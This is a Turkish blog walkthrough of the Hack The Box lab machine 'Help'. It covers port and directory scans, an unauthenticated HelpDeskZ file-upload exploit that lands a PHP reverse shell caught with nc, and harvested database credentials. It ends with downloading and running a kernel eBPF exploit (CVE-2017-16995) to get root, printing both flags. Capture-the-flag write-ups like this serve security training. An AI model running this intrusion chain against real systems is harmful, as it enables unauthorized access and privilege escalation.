İçeriğe geç

Help

Makine Adı Seviye OS Logo
Help - HTB Kolay Linux

Walkthrough

nmap taraması:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3000'de hiç bir şey bulamadım. Bunun üzerine 80'e odaklandım. gobuster taraması attığımda aşağıdaki sonuçları aldım.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.121/ --no-error -t 50 --extensions php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt| tee gobuster3
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.121/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/09/12 09:04:47 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.121/.htpasswd/           (Status: 403) [Size: 297]
http://10.10.10.121/.htpasswd.php        (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.txt        (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.html       (Status: 403) [Size: 301]
http://10.10.10.121/.htaccess/           (Status: 403) [Size: 297]
http://10.10.10.121/.htaccess.php        (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.txt        (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.html       (Status: 403) [Size: 301]
http://10.10.10.121/icons/               (Status: 403) [Size: 293]
http://10.10.10.121/index.html           (Status: 200) [Size: 11321]
http://10.10.10.121/javascript/          (Status: 403) [Size: 298]  
http://10.10.10.121/server-status/       (Status: 403) [Size: 301]  
http://10.10.10.121/support/             (Status: 200) [Size: 4453] 

http://10.10.10.121/support/ adresinde HelpDeskZ isimli bir uygulama koşuyor. Default credential yok ancak verion numarasına göre yayınlanmış bazı exploitler var.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# searchsploit HelpDeskZ                        
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                                                                                                                     | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                                                                                                              | php/webapps/41200.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

İkinci bir gobuster taramamda http://10.10.10.121/support/readme.htm adresini buldum ve burada version numarasının 1.0.2 olduğu yazılıydı yani exploitleri kullanabiliriz ancak bir türlü unauthentated exploit olan dosya yüklemeyi kullanamadım. Bunun üzerine internette araştırmaya başladım.

https://gist.githubusercontent.com/dasithsv/d2b0c8cea39096e19f336f5e29bbf803/raw/a6d24e637a9fb3dfb7c6d1598980af2594f6a168/HelpDeskZ 1.0.2 - Arbitrary File Upload.py

adresinde exploiti okuduğumda aslında mevcut exploiti yanlış kullandığımı gördüm. Sisteme ilk önce bir dosya yüklemem gerekmekte http://10.10.10.121/support/?v=submit_ticket&action=confirmation adresinden reverse shell'imi yükledim daha sonra exploiti çalıştırdım.


┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php                                      130 ⨯
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
1631455471

┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# nc -lvp 1234                                                                                                 1 ⨯
listening on [any] 1234 ...
10.10.10.121: inverse host lookup failed: Unknown host
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.121] 38868
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 07:04:34 up 56 min,  0 users,  load average: 1.15, 1.27, 1.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ 

Ve reverse aldım. İlk flagi okuyalım.


help@help:/home$ cd help
cd help
help@help:/home/help$ ls
ls
total 76
drwxr-xr-x   7 help help  4096 Jan 11  2019 .
drwxr-xr-x   3 root root  4096 Nov 27  2018 ..
-rw-rw-r--   1 help help   272 Jan 11  2019 .bash_history
-rw-r--r--   1 help help   220 Nov 27  2018 .bash_logout
-rw-r--r--   1 root root     1 Nov 27  2018 .bash_profile
-rw-r--r--   1 help help  3771 Nov 27  2018 .bashrc
drwx------   2 help help  4096 Nov 27  2018 .cache
drwxr-xr-x   4 help help  4096 Sep 12 06:08 .forever
-rw-------   1 help help   442 Nov 28  2018 .mysql_history
drwxrwxr-x   2 help help  4096 Nov 27  2018 .nano
drwxrwxr-x 290 help help 12288 Jan 11  2019 .npm
-rw-r--r--   1 help help   655 Nov 27  2018 .profile
-rw-rw-r--   1 help help    66 Nov 28  2018 .selected_editor
-rw-r--r--   1 help help     0 Nov 27  2018 .sudo_as_admin_successful
-rw-rw-r--   1 help help   225 Dec 11  2018 .wget-hsts
drwxrwxrwx   6 root root  4096 Jan 11  2019 help
-rw-rw-r--   1 help help   946 Nov 28  2018 npm-debug.log
-rw-r--r--   1 root root    33 Nov 28  2018 user.txt
help@help:/home/help$ cat user.txt
cat user.txt
bb8a7b36bdce0c61ccebaa173ef946af

Daha sonrasında makine içerisinde inceleme yaptım. İşte ilginç bulduğum sonuçlar.

help        685  0.0  0.2 947668  2992 ?        Ssl  06:08   0:00 /usr/bin/nodejs /usr/local/lib/node_modules/forever/bin/monitor /home/help/help/dist/bundle.js
help        695  0.7  3.7 990444 36928 ?        Sl   06:08   0:27  _ /usr/bin/nodejs /home/help/help/dist/bundle.js
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
:
help@help:/var/www/html/support$ find /var/www/html/support -name "*config*" 2>/dev/null
<port$ find /var/www/html/support -name "*config*" 2>/dev/null               
/var/www/html/support/includes/config.php
help@help:/var/www/html/support$ cat /var/www/html/support/includes/config.php
<port$ cat /var/www/html/support/includes/config.php                         
<?php
    $config['Database']['dbname'] = 'support';
    $config['Database']['tableprefix'] = '';
    $config['Database']['servername'] = 'localhost';
    $config['Database']['username'] = 'root';
    $config['Database']['password'] = 'helpme';
    $config['Database']['type'] = 'mysqli';
    ?>help@help:/var/www/html/support$ 
mysql> select * from users;
select * from users;
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| id | salutation | fullname | email                 | password                                 | timezone         | status |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
|  1 |          0 | helpme   | [email protected]     | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas |      1 |
|  2 |          0 | xcvxv    | [email protected] | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL             |      1 |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:sha1:godhelpmeplz
[*] fst130 Does 'help' have mail?.......................................... yes!
---ore--(4%)
--More--(4%) 
-rw-rw---- 1 help mail 27501 Sep 12 08:35 /var/mail/help
var _user = { username: '[email protected]', password: '5d3c93182bb20f07b994a7f617e99cff' };

Bunların hiçbiri işe yaramadı bende exploit suggester çalıştırdım.

help@help:/tmp$ wget http://10.10.14.18/linux-exploit-suggester.sh
wget http://10.10.14.18/linux-exploit-suggester.sh
--2021-09-12 10:12:06--  http://10.10.14.18/linux-exploit-suggester.sh
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'

linux-exploit-sugge 100%[===================>]  86.81K   466KB/s    in 0.2s    

2021-09-12 10:12:06 (466 KB/s) - 'linux-exploit-suggester.sh' saved [88891/88891]

help@help:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
help@help:/tmp$ 

help@help:/tmp$ 

help@help:/tmp$ 

help@help:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-5899] s-nail-privget

   Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
   Exposure: probable
   Tags: [ ubuntu=16.04 ],manjaro=16.10
   Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
   ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
   Comments: Distros use own versioning scheme. Manual verification needed.

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
help@help:/tmp$ wget http://10.10.14.18/cve-2017-16995.c
wget http://10.10.14.18/cve-2017-16995.c
--2021-09-12 10:57:57--  http://10.10.14.18/cve-2017-16995.c
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'

cve-2017-16995.c    100%[===================>]  13.41K  --.-KB/s    in 0.09s   

2021-09-12 10:57:57 (157 KB/s) - 'cve-2017-16995.c' saved [13728/13728]

help@help:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
help@help:/tmp$ ls
ls
total 1040
drwxrwxrwt 10 root root   4096 Sep 12 10:58 .
drwxr-xr-x 22 root root   4096 Nov 28  2018 ..
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .ICE-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .Test-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .X11-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .XIM-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .font-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 VMwareDnD
-rwxrwxrwx  1 help help  18440 Sep 12 10:58 cve-2017-16995
-rw-rw-rw-  1 help help  13728 Sep 12 10:52 cve-2017-16995.c
-rwxrwxrwx  1 help help 452509 Aug 26 13:47 linpeas.sh
-rwxrwxrwx  1 help help  88891 Sep  8 14:58 linux-exploit-suggester.sh
-rwxrwxrwx  1 help help  41177 Sep  8 14:34 lse.sh
-rw-rw-rw-  1 help help 200427 Sep 12 07:12 result1
-rw-rw-rw-  1 help help 193317 Sep 12 08:36 result2
drwx------  3 root root   4096 Sep 12 06:08 systemd-private-f9459c97985149de9df4c8fd9c15df9e-systemd-timesyncd.service-Ka57wQ
drwx------  2 root root   4096 Sep 12 06:08 vmware-root
help@help:/tmp$ ./cve-2017-16995
./cve-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003af7ba00
[*] Leaking sock struct from ffff88001f403c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003912bbc0
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003912bbc0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b7fe6082dcdf0c1b1e02ab0d9daddb98
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir